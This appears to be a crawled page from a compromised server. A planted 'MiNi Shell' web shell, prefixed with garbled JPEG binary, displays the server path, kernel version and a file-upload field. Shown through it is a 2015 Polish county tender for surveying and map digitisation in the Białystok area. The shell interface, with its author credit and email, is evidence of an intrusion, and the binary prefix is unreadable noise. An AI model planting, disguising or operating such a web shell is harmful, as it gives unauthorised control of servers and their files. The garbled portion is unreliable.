JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150420/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150420/55245-N-2015.html

<p class="kh_header"><b>Białystok: wykonanie prac geodezyjnych oraz opracowanie map</b><br>
<b>Numer ogłoszenia: 55245 - 2015; data zamieszczenia: 20.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w  Białymstoku , ul. Borsucza 2, 15-569 Białystok, woj. podlaskie, tel. 85 740 39 51, faks 85 740 39 82.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie prac geodezyjnych oraz opracowanie map.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A:
Wykonanie prac geodezyjnych związanych z opracowaniem dokumentacji geodezyjnej  dla potrzeb postępowań mających na celu aktualizację zasobu geodezyjnego i kartograficznego w trybie przepisów § 37, 38, 39 Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001 roku  w sprawie ewidencji gruntów i budynków, obejmującej granice wspólne dla działek wymienionych poniżej oznaczonych numerami:
1184/2, 1185/2, 1186/6, 1186/4, 1187/2, 1188/2 - położonych w obrębie Czarna Białostocka gm. Czarna Białostocka;
247/4, 248, 244/1, 246, 243, 241/1, 240, 239, 238, 237/2, 237/1 - położonych w obrębie Bachury gm. Michałowo;
 - zamówienie  finansowane będzie ze środków dotacji.

Część B:
Przedmiotem opracowania jest przekształcenie analogowych map sytuacyjno-wysokościowych oraz map zasadniczych do postaci rastrowej numerycznej mapy zasadniczej. W ramach przedmiotowego opracowania należy: 
1.	Obowiązujący układ odniesienia po przekształceniu mapy - PUWG2000/24.
2.	Każdemu arkuszowi mapy po zeskanowaniu muszą odpowiadać 4 pliki:
a)	tiff nieskalibrowany z ramką ,
b)	plik po kalibracji w układzie, w którym została sporządzona sekcja - obcięty do zakresu sekcji,
c)	plik EVR po transformacji na układ 2000/24,
d)	plik raportu kalibracji,
e)	plik meta danych XML;
3.	Skanowanie map analogowych wykonać należy z rozdzielczością 250 dpi; pliki rastrowe należy zapisywać w formacie TIFF z kompresją LZW, ilość kolorów 256.
4.	W ramach realizacji zamówienia wykonawca dokona procesu uszlachetnienia zeskanowanych map, 
w celu:
a)	usunięcia plam i szumu pikselowego,
b)	wyeliminowania zjawiska zlewania się elementów liniowych,
c)	wyeliminowania z tła rysunku znaczących zabrudzeń powierzchniowych,
d)	poprawę czytelności treści mapy.

5.	Zeskanowane pliki należy oznaczyć zgodnie z nazwą sekcji mapy  np. 245.412.254.tif. W przypadku występowania nakładek do pliku należy dopisać symbol nakładki np. 245.412.254_U.tif.
6.	Pliki raportu kalibracji powinny posiadać nazwę identyczną z nazwą kalibrowanego pliku.  Pliki EVR które zostaną utworzone ze skanowanych map powinny posiadać 256 kolorów.
7.	W ramach realizacji zamówienia wykonawca dokona kalibracji i uspójnienia (uzgodnienia styków) poszczególnych arkuszy będących przedmiotem opracowania w postaci rastrowej.
8.	Jako punkty dostosowania do kalibracji map należy wykorzystać punkty przecięcia siatki kwadratów (w razie braku punktów siatki kwadratów na danym arkuszu należy ją wkartować), punkty osnowy oraz szczegóły I grupy  - zgodnie z przepisami rozporządzenia MSWiA z 9 listopada 2011 roku w sprawie standardów technicznych wykonywania pomiarów sytuacyjnych i wysokościowych oraz opracowywania 
i przekazywania wyników tych pomiarów do państwowego zasobu geodezyjnego i kartograficznego (Dz. U. z 2011 r. Nr 263 poz. 1572 ).
9.	Kalibracja winna być wykonana metodą afiniczną przy wykorzystaniu maksymalnej ilości krzyży siatki kwadratów rozmieszczonych równomiernie.  Błąd transformacji (RMSE) nie powinien przekroczyć 0.06 m  w przypadku map w skali 1:500, 0.11m  w przypadku map w skali 1:1000.
10.	Wykonawca dokona kontroli poprawności wykonanej kalibracji poprzez pomiar różnic współrzędnych identycznych punktów na stykach arkuszy. Za dopuszczalną różnicę w położeniu tych samych punktów przyjmuje się wielkość 2x0.2 mm w skali map będących przedmiotem opracowania.
11.	Przebieg procesu kalibracji oraz wyniki czynności kontrolnych o których mowa w pkt. 7-10 wykonawca utrwali w raporcie kalibracji, który stanowić będzie część składową operatu technicznego podlegającego przekazaniu do zasobu geodezyjnego i kartograficznego.
12.	Zaraz po rozpoczęciu prac wykonawca będzie zobowiązany  do dostarczenia próbki plików dla 10 sekcji w celu ich kontroli i oceny obróbki rastrów,
13.	Dla wszystkich opracowanych rastrów należy wykonać metadane - §12 Rozporządzenia Ministra Administracji i Cyfryzacji  w sprawie organizacji i trybu prowadzenia państwowego zasobu geodezyjnego i kartograficznego.  Wyniki zamówienia należy przekazać na zewnętrznym dysku z interfejsem USB 3,0.
Opracowaniem należy objąć łącznie 2900 sekcji analogowej mapy zasadniczej, w tym:

GMINA ZAWADY
Sekcja mapy dziesiątki     	    ilość arkuszy do opracowania
224.224            			1
245.113			22	
244.242    			31
244.131			56
244.244			1
245.133			51
245.311			14
245.134		            56
						Razem: 232
GMINA TYKOCIN
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.114			41
245.112			5
245.123			9
245.132			58
245.312			2
245.321			47
245.143		           53
245.141			61
245.142			56 			Razem: 332
GMINA CHOROSZCZ
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.144		           46
245.322                             	78
245.233           		             4
245.411                              	59
						Razem: 187
GMINA TUROŚŃ KOŚCIELNA
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.324				44
245.413			            77
245.342				35
245.431				78
245.433				63
						Razem: 297
GMINA JUCHNOWIEC KOŚCIELNY
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.412				33
245.414			            82
255.211				1
255.212				55
245.434				84
245. 432				81
						Razem: 336
GMINA DOBRZYNIEWO DUŻE
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.122				37
245.124				75
245.211				31
245.213				61
245.231			            77
						Razem: 281
GMINA CZARNA BIAŁOSTOCKA
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
235.433				12
235.432			            46
235.434				61
235.441				14
235.443				35
245.221				34
						Razem: 202
GMINA WASILKÓW
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.212				65
245.221				34
245.214		                       37
245.223				33
245.232		                       24
						Razem: 193



GMINA SUPRAŚL
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.243				22
245.234				1
245.241				72
245.242				37
245.224				46
245.222				18
						Razem: 196
GMINA ZABŁUDÓW
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.244				55
245.421				64
245.422				44
246.311				22
245.424				78
245.442				81
245.444				16
245.443				71
255.221				54
245.423				90
245.441 				69
 						Razem: 644.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części A - Wykonawca spełni ten warunek, jeżeli wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonane zostały min.  2 dokumentacje do postępowań mających na celu aktualizację zasobu geodezyjnego i kartograficznego w trybie przepisów § 37, 38 Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001 roku w sprawie ewidencji gruntów 
i budynków.

Dotyczy części B - Wykonawca spełni ten warunek, jeżeli wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie wykonał min. 1 dokumentację z zakresu przekształcenia map analogowych do wersji numerycznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wyznaczone przez niego osoby (co najmniej jedna) do realizacji zamówienia posiadają uprawnienia do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w zakresie 1,2 - dotyczy części A</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się aby wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - dotyczy części B.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja wykonania jakości usługi - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.st.bialystok.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Białymstoku ul. Borsucza 2, 15-569 Białystok, pokój nr 112...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2015 godzina 09:30, miejsce: Starostwo Powiatowe w Białymstoku Biuro Obsługi Interesantów - pokój nr 10 ul. Borsucza 2, 15-569 Białystok..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część A - wykonanie prac geodezyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie prac geodezyjnych związanych z opracowaniem dokumentacji geodezyjnej  dla potrzeb postępowań mających na celu aktualizację zasobu geodezyjnego i kartograficznego w trybie przepisów § 37, 38, 39 Rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001 roku  w sprawie ewidencji gruntów i budynków, obejmującej granice wspólne dla działek wymienionych poniżej oznaczonych numerami:
1184/2, 1185/2, 1186/6, 1186/4, 1187/2, 1188/2 - położonych w obrębie Czarna Białostocka gm. Czarna Białostocka;
247/4, 248, 244/1, 246, 243, 241/1, 240, 239, 238, 237/2, 237/1 - położonych w obrębie Bachury gm. Michałowo;
 - zamówienie  finansowane będzie ze środków dotacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 140.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja wykonania jakości usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część B
opracowanie map.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem opracowania jest przekształcenie analogowych map sytuacyjno-wysokościowych oraz map zasadniczych do postaci rastrowej numerycznej mapy zasadniczej. W ramach przedmiotowego opracowania należy: 
1.	Obowiązujący układ odniesienia po przekształceniu mapy - PUWG2000/24.
2.	Każdemu arkuszowi mapy po zeskanowaniu muszą odpowiadać 4 pliki:
a)	tiff nieskalibrowany z ramką ,
b)	plik po kalibracji w układzie, w którym została sporządzona sekcja - obcięty do zakresu sekcji,
c)	plik EVR po transformacji na układ 2000/24,
d)	plik raportu kalibracji,
e)	plik meta danych XML;
3.	Skanowanie map analogowych wykonać należy z rozdzielczością 250 dpi; pliki rastrowe należy zapisywać w formacie TIFF z kompresją LZW, ilość kolorów 256.
4.	W ramach realizacji zamówienia wykonawca dokona procesu uszlachetnienia zeskanowanych map, 
w celu:
a)	usunięcia plam i szumu pikselowego,
b)	wyeliminowania zjawiska zlewania się elementów liniowych,
c)	wyeliminowania z tła rysunku znaczących zabrudzeń powierzchniowych,
d)	poprawę czytelności treści mapy.

5.	Zeskanowane pliki należy oznaczyć zgodnie z nazwą sekcji mapy  np. 245.412.254.tif. W przypadku występowania nakładek do pliku należy dopisać symbol nakładki np. 245.412.254_U.tif.
6.	Pliki raportu kalibracji powinny posiadać nazwę identyczną z nazwą kalibrowanego pliku.  Pliki EVR które zostaną utworzone ze skanowanych map powinny posiadać 256 kolorów.
7.	W ramach realizacji zamówienia wykonawca dokona kalibracji i uspójnienia (uzgodnienia styków) poszczególnych arkuszy będących przedmiotem opracowania w postaci rastrowej.
8.	Jako punkty dostosowania do kalibracji map należy wykorzystać punkty przecięcia siatki kwadratów (w razie braku punktów siatki kwadratów na danym arkuszu należy ją wkartować), punkty osnowy oraz szczegóły I grupy  - zgodnie z przepisami rozporządzenia MSWiA z 9 listopada 2011 roku w sprawie standardów technicznych wykonywania pomiarów sytuacyjnych i wysokościowych oraz opracowywania 
i przekazywania wyników tych pomiarów do państwowego zasobu geodezyjnego i kartograficznego (Dz. U. z 2011 r. Nr 263 poz. 1572 ).
9.	Kalibracja winna być wykonana metodą afiniczną przy wykorzystaniu maksymalnej ilości krzyży siatki kwadratów rozmieszczonych równomiernie.  Błąd transformacji (RMSE) nie powinien przekroczyć 0.06 m  w przypadku map w skali 1:500, 0.11m  w przypadku map w skali 1:1000.
10.	Wykonawca dokona kontroli poprawności wykonanej kalibracji poprzez pomiar różnic współrzędnych identycznych punktów na stykach arkuszy. Za dopuszczalną różnicę w położeniu tych samych punktów przyjmuje się wielkość 2x0.2 mm w skali map będących przedmiotem opracowania.
11.	Przebieg procesu kalibracji oraz wyniki czynności kontrolnych o których mowa w pkt. 7-10 wykonawca utrwali w raporcie kalibracji, który stanowić będzie część składową operatu technicznego podlegającego przekazaniu do zasobu geodezyjnego i kartograficznego.
12.	Zaraz po rozpoczęciu prac wykonawca będzie zobowiązany  do dostarczenia próbki plików dla 10 sekcji w celu ich kontroli i oceny obróbki rastrów,
13.	Dla wszystkich opracowanych rastrów należy wykonać metadane - §12 Rozporządzenia Ministra Administracji i Cyfryzacji  w sprawie organizacji i trybu prowadzenia państwowego zasobu geodezyjnego i kartograficznego.  Wyniki zamówienia należy przekazać na zewnętrznym dysku z interfejsem USB 3,0.
Opracowaniem należy objąć łącznie 2900 sekcji analogowej mapy zasadniczej, w tym:

GMINA ZAWADY
Sekcja mapy dziesiątki     	    ilość arkuszy do opracowania
224.224            			1
245.113			22	
244.242    			31
244.131			56
244.244			1
245.133			51
245.311			14
245.134		            56
						Razem: 232
GMINA TYKOCIN
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.114			41
245.112			5
245.123			9
245.132			58
245.312			2
245.321			47
245.143		           53
245.141			61
245.142			56 			Razem: 332
GMINA CHOROSZCZ
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.144		           46
245.322                             	78
245.233           		             4
245.411                              	59
						Razem: 187
GMINA TUROŚŃ KOŚCIELNA
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.324				44
245.413			            77
245.342				35
245.431				78
245.433				63
						Razem: 297
GMINA JUCHNOWIEC KOŚCIELNY
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.412				33
245.414			            82
255.211				1
255.212				55
245.434				84
245. 432				81
						Razem: 336
GMINA DOBRZYNIEWO DUŻE
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.122				37
245.124				75
245.211				31
245.213				61
245.231			            77
						Razem: 281
GMINA CZARNA BIAŁOSTOCKA
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
235.433				12
235.432			            46
235.434				61
235.441				14
235.443				35
245.221				34
						Razem: 202
GMINA WASILKÓW
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.212				65
245.221				34
245.214		                       37
245.223				33
245.232		                       24
						Razem: 193



GMINA SUPRAŚL
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.243				22
245.234				1
245.241				72
245.242				37
245.224				46
245.222				18
						Razem: 196
GMINA ZABŁUDÓW
Sekcje mapy dziesiątki     	ilość arkuszy do opracowania
245.244				55
245.421				64
245.422				44
246.311				22
245.424				78
245.442				81
245.444				16
245.443				71
255.221				54
245.423				90
245.441 				69
 						Razem: 644.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja wykonania jakości usługi - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com